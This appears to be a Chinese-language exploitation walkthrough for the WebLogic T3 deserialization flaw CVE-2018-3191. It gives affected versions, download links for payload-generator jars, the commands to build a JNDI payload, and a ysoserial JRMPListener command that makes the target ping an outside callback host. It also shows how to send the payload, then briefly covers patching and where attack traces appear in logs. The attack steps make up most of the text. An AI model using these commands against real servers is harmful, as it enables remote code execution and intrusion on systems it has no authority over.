漏洞利用前提
-
影響版本
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3 -
配置
開啓T3協議(默認開啓)
漏洞利用方法
生成payload
針對不同的weblogic版本,需要使用不同的payload
版本12.2.1.3使用下面的工具生成payload
https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar
java -jar weblogic-spring-jndi-12.2.1.3.jar rmi://127.0.0.1:6666/axin >axin.txt
版本10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1使用如下工具生成payload
https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://127.0.0.1:6666/axin >axin.txt
攻擊者服務器監聽
java -cp ysoserial-0.0.6-APSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections1 "ping axin123.3w9vbg.ceye.io"
執行上述命令,會監聽6666端口,如果目標機連過來,就會在目標機執行ping命令
發送payload
python weblogic.py 目標主機ip 目標機端口 存放payload的文件
修復方案
- 打補丁
- 禁用T3協議
痕跡分析
一般不會捕捉到錯誤,但是如果攻擊者在攻擊過程中出現些許錯誤(例如找不到RMI服務端註冊的對象)就會在日誌中留下攻擊者服務器的地址信息
日誌路徑:
user_projects/domains/base_domain/servers/AdminServer/logs
在以你的私域爲名的日誌中(例如我的域名叫做base_domain,這也是默認的域名,所以在日誌base_admin.logxxx中)可以看到